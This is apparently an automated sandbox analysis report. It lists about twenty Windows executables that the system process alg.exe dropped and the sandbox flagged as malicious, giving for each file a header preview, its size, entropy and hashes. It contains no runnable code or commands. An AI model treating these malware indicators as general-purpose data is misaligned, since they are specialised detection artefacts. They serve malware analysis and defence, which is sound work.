                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................]+......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1222656
                                                                                                                                                                                                                                    Entropy (8bit):6.712002891148768
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:WRudzXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WAdzXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:3182850B32DEA9F810CE7E61E1B427D7
                                                                                                                                                                                                                                    SHA1:1CA8947E8DC23C48BE48754B28CB598C72A8C76F
                                                                                                                                                                                                                                    SHA-256:D03B47ADB3BAD8BD7029A7D9CCF0B76C1FB8F97E2D63D1BF7E46567E51ADB6C5
                                                                                                                                                                                                                                    SHA-512:E081161C15430399C428967A35CD976C45DE0BD6EAE9B58873FBC770C3923CD20568FC9607B20A93A2D9EA5A3E1A8ADB6D898245A15BEC9121352E1E529C2963
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.......................................... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1457664
                                                                                                                                                                                                                                    Entropy (8bit):5.082152504651986
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:vvbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:DB43714362B8A5D018B55D84CBEA6346
                                                                                                                                                                                                                                    SHA1:9E3E79844694030945EEF41A8ED8F49D4B4FFED5
                                                                                                                                                                                                                                    SHA-256:415A65A1DF89199FF82071FCC711CED00C7D8959291BD9B8AD4B883714441C03
                                                                                                                                                                                                                                    SHA-512:26108B83F8B4E0C6CDB0442E093531282004467BAFD28F096B4193C2F925C42A4942E9EFF913814C2BAE9D7E4BE1B74DB385B7827780D10229A7D14B3EB8F1D2
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1461248
                                                                                                                                                                                                                                    Entropy (8bit):5.46860816360811
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:d5zhM1XSEesqjnhMgeiCl7G0nehbGZpbD:pMsrDmg27RnWGj
                                                                                                                                                                                                                                    MD5:CD8D379286EC4260404E93511DD61B4D
                                                                                                                                                                                                                                    SHA1:3106238725D1FC4C93B504C48F02A68F07F179DB
                                                                                                                                                                                                                                    SHA-256:B62199B265A93F5831C2607C65FF1ADC1BB0AF1640D362045CB7030E3D78B4EC
                                                                                                                                                                                                                                    SHA-512:F86556496DE515D9DF1CA560E29749B85CC5AA6A1FCC08D39A791BF630C5A3C4CDD05BD0A46498315D47496F1B6D7ECA6CE3A65BF77B861FC5241125BAFC1F08
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.....................................t.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                                                    Entropy (8bit):6.499775579159837
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:EtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:EjEIa4HIEWOc53D527BWG
                                                                                                                                                                                                                                    MD5:A00C6EC4B0930B3F4A442D704E0A0F47
                                                                                                                                                                                                                                    SHA1:5AF7A7967DC05DA4D1A19513723992C087E90357
                                                                                                                                                                                                                                    SHA-256:8E7F56BCB80FECCFE8EEC9E81D99B8E2931FD785F59C8D054AB6EBB7D8862A03
                                                                                                                                                                                                                                    SHA-512:A43A73559965F7174B23D372021226FD5A17E48CA3FF573D27A8B15B6EC207FA1C5335DF52A29A84D1018EE674C432ED0E8B2FD7ADBD81DDF0AD6AAE9CDD1169
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....F @... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                                                    Entropy (8bit):7.999367300919114
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1572864:EQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:7XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                    MD5:12B526590422A335FD9F6F3B1FABF5C9
                                                                                                                                                                                                                                    SHA1:DC8BF8C4DC04BAF3E3FA7855A7103004C1D9AF5C
                                                                                                                                                                                                                                    SHA-256:010B6DE069199DBD8550E96A3EB1E586B4436182C7969203E5475B1A3515815D
                                                                                                                                                                                                                                    SHA-512:D542183B218E9A87679703B842D61E3DB22E5A14E335450FBCBC24AD87EE8BDE14D36AD8B0F6AF4AF2368EA755C701364301BE556D19D6827861B6D9206B618C
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......2..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1180160
                                                                                                                                                                                                                                    Entropy (8bit):5.084794381325986
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:PWrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:509E30FD3A0F3F82F5305DDA74C9C7DC
                                                                                                                                                                                                                                    SHA1:2925B7BD5F4B455A02A4B23B64D331A7010CAA2A
                                                                                                                                                                                                                                    SHA-256:EFD2221658DC61205760967B832D079E7D205A9E284D6B1A60FFFF6213934456
                                                                                                                                                                                                                                    SHA-512:816E7C6ACD3F59CFFF80090E1C8CAE559A40217EABBE3FF7A64F42151AD247EC9883C5DF9B53E5C2669542262ECA73399326FEB48BAF51057EF46EB301EC0476
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6210048
                                                                                                                                                                                                                                    Entropy (8bit):6.386703064822595
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:hDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXp:SnN9KfxLk6GEQTX5UKzNDQD527BWG
                                                                                                                                                                                                                                    MD5:EEBBBD8B9F7A198BDF0616983F68C3F7
                                                                                                                                                                                                                                    SHA1:C6153AC88DBF0363904B8CC81BF095AFB76DC3DC
                                                                                                                                                                                                                                    SHA-256:B0644FD041ABD24439EA1FBFBF861867906305EAE6737617D42C0ED064A5EC79
                                                                                                                                                                                                                                    SHA-512:DEB8832F913F80C0F9386F980DF7313D2A41973DF1A5B35913DAF5EDB337F5C6251E39EB7487054D7880A11DAE8E96A805228BC82EF397E06A32FAFC51C3FF99
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1157120
                                                                                                                                                                                                                                    Entropy (8bit):5.041483554006955
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:q2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:q2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:D6DC4560C225998D7FE1560F9A627750
                                                                                                                                                                                                                                    SHA1:E9A9E0897212334B78C2CA8518B0491F3143039F
                                                                                                                                                                                                                                    SHA-256:518C018BE67987143897DEEF029869108BA772ADA36BE9CC7E4216F93EA8FFB9
                                                                                                                                                                                                                                    SHA-512:230D713E5A819BC83B38A23CAFC96921BF3BB2A542BF6612C7D1472F6DF233737528EC630B245462A88CABCE12AA5C273766E7FAB77EC678377F6372BD67B2F4
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................A..... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12039168
                                                                                                                                                                                                                                    Entropy (8bit):6.596677792680047
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:98304:Nb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKBD527BWG:xnPgTHIwZoRBk9DdhSUEVIXgKBVQBWG
                                                                                                                                                                                                                                    MD5:C0DB1C529C56B3AEEA8547ABD1A7A70D
                                                                                                                                                                                                                                    SHA1:108BB6D164AC26B49187A595E2E60C501B637BCD
                                                                                                                                                                                                                                    SHA-256:810AD9CB9BBA50F0106F9182C27EACB0D4982B1BDF69B7DAB3623A1E6443C135
                                                                                                                                                                                                                                    SHA-512:21E89B1EB254E0C18E14EC48C9E05E6CC35A29F91179E5C7C2AFB7760D5AE93FED611099A80CF39159E44D0577CCE151600D25B1182FD1D64E7C94887E396DAB
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1322496
                                                                                                                                                                                                                                    Entropy (8bit):5.281814811498312
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:Vg5FvCPusNsqjnhMgeiCl7G0nehbGZpbD:yftmDmg27RnWGj
                                                                                                                                                                                                                                    MD5:4E29357EF81FFEF4487A703207CAEF64
                                                                                                                                                                                                                                    SHA1:3F54481ED797D99299CF4AF77158E8D868E947BA
                                                                                                                                                                                                                                    SHA-256:2E9124C13EA1AA7C73E4AD463B5BF4304F9B417901E14030FBCBF9440F8679A3
                                                                                                                                                                                                                                    SHA-512:CD50E5690CEC3F6D4E32C55A0E79FA89D5EB4A24665B2883D4FB8F72B944B1D044E52E5204832BFB176D7FD33CFCF4A76718C4FD4C3238391128023948B8AA95
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......04.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1339904
                                                                                                                                                                                                                                    Entropy (8bit):7.208888566408563
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:8jKTIsAjFuvtIfmFthMaT5U8aChaeuPsqjnhMgeiCl7G0nehbGZpbD:8jIMmPh7TT79uDmg27RnWGj
                                                                                                                                                                                                                                    MD5:DFB4AEF4E17CAC320D023E6D0BDE3608
                                                                                                                                                                                                                                    SHA1:EBEF67BD3A22EC217DCFF6A89460FF20A9AC54BA
                                                                                                                                                                                                                                    SHA-256:E1424F46D4EF678B45B00387B454E267C1C014FED3DFBCA277335D43E5BAEA13
                                                                                                                                                                                                                                    SHA-512:C68F1FC4F14C1DC5150B17EECCA59214CE80C188A508DB5B21274BDA8D5DFE5B4B05013CF3D0AF5FE99431EC56DE07CC34C41FB2CBB0BE3616F04E988B52D33E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....W..... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1515520
                                                                                                                                                                                                                                    Entropy (8bit):5.411764925317414
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:TGqVwCto1Gm5Wg7sqjnhMgeiCl7G0nehbGZpbD:iZ1GmUgDmg27RnWGj
                                                                                                                                                                                                                                    MD5:82A7BC1B93DD546C21CFFBDC2AFBC0F2
                                                                                                                                                                                                                                    SHA1:ACB4A3BC8B65E684F40440F42E3D491B9C90B89E
                                                                                                                                                                                                                                    SHA-256:2B7E6FD104B451EE0B9D5C676840DB69BDAF8DB2CB99D95AD9C25022C516A6A9
                                                                                                                                                                                                                                    SHA-512:F804963B963C96EBAC4B1DC5215EB070B8BA94639DDDA7E495C1AC05C445A1F17D64BC7DEB8690697E64B01FE5C18E069287E52AE5E2B2A952D9C5D2C0025272
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................U..... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1253376
                                                                                                                                                                                                                                    Entropy (8bit):5.157400338692046
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:cWBWvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cWBWvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:94155AAB6CB0B60B3DF2B94248E39080
                                                                                                                                                                                                                                    SHA1:93094E35B173B5E6914D54BC8F05E8E81DF05CAD
                                                                                                                                                                                                                                    SHA-256:DD978298EF0162BADF116ABAE1410F753C220DD630BDB5E48220B2C078C10D57
                                                                                                                                                                                                                                    SHA-512:7AD1ADAA8A3F2FAB53EB7D9540BCE2211488967EBF1B93B77821252651F4E4FF64E3B631B76A02BDE11E65D50BC19C11506CAFA6BBCEF646DABED695F4787840
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                    Entropy (8bit):7.228490055874191
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:pf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa04sqjnhMgeiCl7G0nehbGZpbD:p+GtCi27mVTyT+a0kDmg27RnWGj
                                                                                                                                                                                                                                    MD5:3B7049C6109BE2E6026780EF80DCE1EC
                                                                                                                                                                                                                                    SHA1:9F31921DAA200170E223FD1C7E4AD9F9F6E4ED94
                                                                                                                                                                                                                                    SHA-256:BA3D192A61485E94F445937D25B1215FCB682AD41CB362353A317467E8D07E7C
                                                                                                                                                                                                                                    SHA-512:9C4BB5314C602757855A23194546EB052FFEC44EDE43F4A245AB18F91BA0EE032C1DD7E15EF1A2E2C5B7729D0DF2E9AE311262E61B0F10EC63DC9637D7866DBC
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................=w.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3110912
                                                                                                                                                                                                                                    Entropy (8bit):6.649662566604278
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:pU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYXDmg27RnWGj:+2NfHOIK5Ns6qR9dD527BWG
                                                                                                                                                                                                                                    MD5:A85750B39CA41892852C6174C5FB3DA9
                                                                                                                                                                                                                                    SHA1:392F550F1F0E0EBA3C4B1B7CCF251EB2237FD7CF
                                                                                                                                                                                                                                    SHA-256:5CFD35D1264646E7581723F8515FFFDE3ABD5CD1D43ED8E56D1063B768984B45
                                                                                                                                                                                                                                    SHA-512:8BF790C22B342E33833B805CB52919C6FB9755202236F4A2AD163A79BF3B121B727120E2EAD6E937282BA51146A2F365BB6DB6378C07CD8E41E19D22A11E8715
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....oq0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1588224
                                                                                                                                                                                                                                    Entropy (8bit):5.53192243393323
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:VkcWTUQcydLsqjnhMgeiCl7G0nehbGZpbD:VhKUcDmg27RnWGj
                                                                                                                                                                                                                                    MD5:46C00427403FDF2564DD3B19A798A003
                                                                                                                                                                                                                                    SHA1:AE9E942D2A7655EE73DD10144517881989C69128
                                                                                                                                                                                                                                    SHA-256:976DD43C535EE469ACCFA4AEEC67EE2D405312D26C82D7F4BA95DE087D6CEA9F
                                                                                                                                                                                                                                    SHA-512:EDF4D0BE250CE497A500827E688914C8870137B166CC850B12AAC1F9633F97B5A81F009BE7145ECC25DBBF5C6C3974CDDD047FC3D45CF25B904E13466915F33D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................yT.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1338368
                                                                                                                                                                                                                                    Entropy (8bit):5.352662589378096
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:zfY+FUBoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zA+qBosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:C65619538A409771E3487BFD6E7FE7EC
                                                                                                                                                                                                                                    SHA1:FB88CCC6D0CDC079EE1D5E06F0C94EB6EEA17872
                                                                                                                                                                                                                                    SHA-256:8F8B8905D654D8EB873B1F9AD57BF205E186DE61A92D2131CB549BA47286D160
                                                                                                                                                                                                                                    SHA-512:9E6323218780528076A6E99E930F366B9B3598DCA3016321C5510AD7BEC062369968687E31F09A22910D2FC6784C77F31525E6594EF943A5F75AB8CF933705D1
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
